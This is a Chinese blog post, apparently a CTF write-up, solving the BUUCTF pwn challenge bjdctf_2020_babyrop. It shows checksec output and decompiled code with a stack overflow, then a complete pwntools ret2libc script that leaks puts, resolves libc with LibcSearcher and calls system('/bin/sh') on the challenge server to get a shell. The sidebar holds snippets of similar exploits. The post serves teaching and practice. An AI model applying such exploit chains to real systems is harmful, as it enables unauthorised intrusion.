BUU刷题-Pwn-bjdctf_2020_babyrop

最新推荐文章于 2024-05-12 08:52:10 发布
最新推荐文章于 2024-05-12 08:52:10 发布
阅读量61 收藏
点赞数
分类专栏: BUU_pwn解题wp 文章标签: 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65474192/article/details/131332916
版权
解题思路:

泄露或修改内存数据:

  1. 堆地址:无需
  2. 栈地址:无需
  3. libc地址:[[利用got表和plt表泄露数据]] puts
  4. BSS段地址:无需
    劫持程序执行流程:[[ret2text(栈溢出的gadgets利用)]]
    获得shell或flag:[[调用libc中的system]]
学到的知识:

[[LibcSearcher的使用]]

题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file bjdctf_2020_babyrop     
bjdctf_2020_babyrop: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ebe33bb41cb0dcdde518b9dfb38eb03a104ee0b7, not stripped
                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=bjdctf_2020_babyrop 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols    FORTIFY  Fortified       Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   73) Symbols  No     0               1               bjdctf_2020_babyrop

libc版本:
wp借鉴:

核心伪代码分析:

存在利用的的代码:

ssize_t vuln()
{
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  puts("Pull up your sword and tell me u story!");
  return read(0, buf, 0x64uLL);
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
  init(argc, argv, envp);
  vuln();
  return 0;
}
分析:

一个简单的栈溢出构造ROP链!

脚本:
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64',os='linux')

pwnfile='./bjdctf_2020_babyrop'
sh=remote('node4.buuoj.cn',28172)
elf = ELF(pwnfile)
#sh=process(pwnfile)

#gdb.attach(sh)
#pause()

main_addr=0x4006AD
pop_rdi_ret=0x400733

#利用栈溢出泄漏地址
payload=b'a'*0x28+p64(pop_rdi_ret)+p64(elf.got["puts"])+p64(elf.plt["puts"])+p64(main_addr)
sh.recvuntil(b"story!\n")
sh.sendline(payload)
puts_addr=u64(sh.recv(6).ljust(8,b'\x00'))
print("puts:",hex(puts_addr))

#远程
#第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型
obj = LibcSearcher("puts", puts_addr)

puts_offest=obj.dump("puts")          #write 偏移
system_offest=obj.dump("system")        #system 偏移
bin_sh_offest=obj.dump("str_bin_sh")    #/bin/sh 偏移

base_addr=puts_addr-puts_offest
print("base_addr:",hex(base_addr))

bin_sh_addr=base_addr+bin_sh_offest
print("bin_sh_addr:",hex(bin_sh_addr))

system_addr=base_addr+system_offest
print("system_addr:",hex(system_addr))


payload1=b'a'*0x28+p64(pop_rdi_ret)+p64(bin_sh_addr)+p64(system_addr)
sh.recvuntil(b"story!\n")
sh.send(payload1)

sh.interactive()
Brinmon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apachecn#apachecn-ctf-wiki#[WP/BUU/CTF]Cookie-Store-解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
bjdctf_2020_babyrop
u014377094的博客
01-25 902
新手向解释
bjdctf_2020_babyropBUUCTF】
qq_41696518的博客
08-31 308
bjdctf_2020_babyrop
BUUCTF-pwn记录(22-7-30更新)
Morphy_Amo的博客
03-04 4263
BUUCTF记录
BUU(三)
playmaker的博客
03-13 898
BUU(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到目直...
pwn入门-buu第一页笔记(32道)(更新完毕,下一章见)
2303_79366759的博客
03-10 1060
可以发现我们输入I之后被替换成了you,那么根据这个特性,本来只能输入32个字符的fget函数,我们只要输入适当的I,再构造合适的payload,那么在执行这个strcpy(s, v0)函数时就可以发生栈溢出。这个函数的目的是打开名为 "flag.txt" 的文件,从该文件中读取最多 45 个字符,并将结果存储在 fl4g 数组中。寒假做过的,现在可能有点忘了,写一下解的同时巩固一下自己,同时供各位正在入门pwn的师傅参考一下,写的不好的地方希望有师傅多多指教,第一次写博客,写的不好的地方还请见谅.
BUU1
weixin_52878095的博客
02-17 2977
test_your_nc 下载附件,放到linux下面,使用checksec查看文件信息 checksec test 发现是64位小端序,开了栈不可执行和PIE 把文件用IDA打开,发现main函数直接调用了system("/bin/sh") 所以直接用pwntools建立连接 from pwn import * r = remote("IP",PORT) r.interactive() 拿到shell,直接cat flag rip 下载附件,放到linux下面,使用checksec查看文件信息 che
pwnnum40----ret2libc
tbsqigongzi的博客
05-02 317
BUUCTF-PWN-bjdctf_2020_babyrop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 思路 read函数明显的栈溢出,read函数输入0x64字节,而buf只有0x20字节,找一下发现函数没有后门函数,但是有puts函数,可以用其泄
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
thuong_mai_dien_tu_magento
03-05
Docker Magento 2.4.X开源(CE)02-2021 用于Magento 2.4.x开发的Docker容器,包括: ... 阿帕奇2.4 MYSQL 8 清漆6 FPC 兔子MQ PhpMyAdmin 记忆快取 弹性搜寻7.x REDIS会话,系统,FPC ... 编辑.env-添加您的...
RDPWINDOWS-ANHDUY
04-16
RDPWINDOWS-ANHDUY 该虚拟机可使用6个小时完全免费,直到您使用2000分钟/月6小时后,您可以转到“操作”以再次运行您的虚拟机... 您可以在以下位置观看教学视频: ://youtu.be/-buu​​A_w-ouY AnhDuy VST版权所有2021
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8220
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
linux下的进程通信
最新发布
羊羊羊
05-12 671
进程通信详解、管道、命名管道、匿名管道...
【Linux】文件内容相关的命令,补充:管道符
yannan20190313的博客
05-07 1113
【Linux】文件内容相关的命令,补充:管道符
Linux 第二十三章
一怀明月的博客
05-08 947
回顾文件 fopen() fwrite fputs >文件名 追加重定向 认识系统接口 open linux中常见的函数传参数 umask write read 语言和系统的区别 文件描述符
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值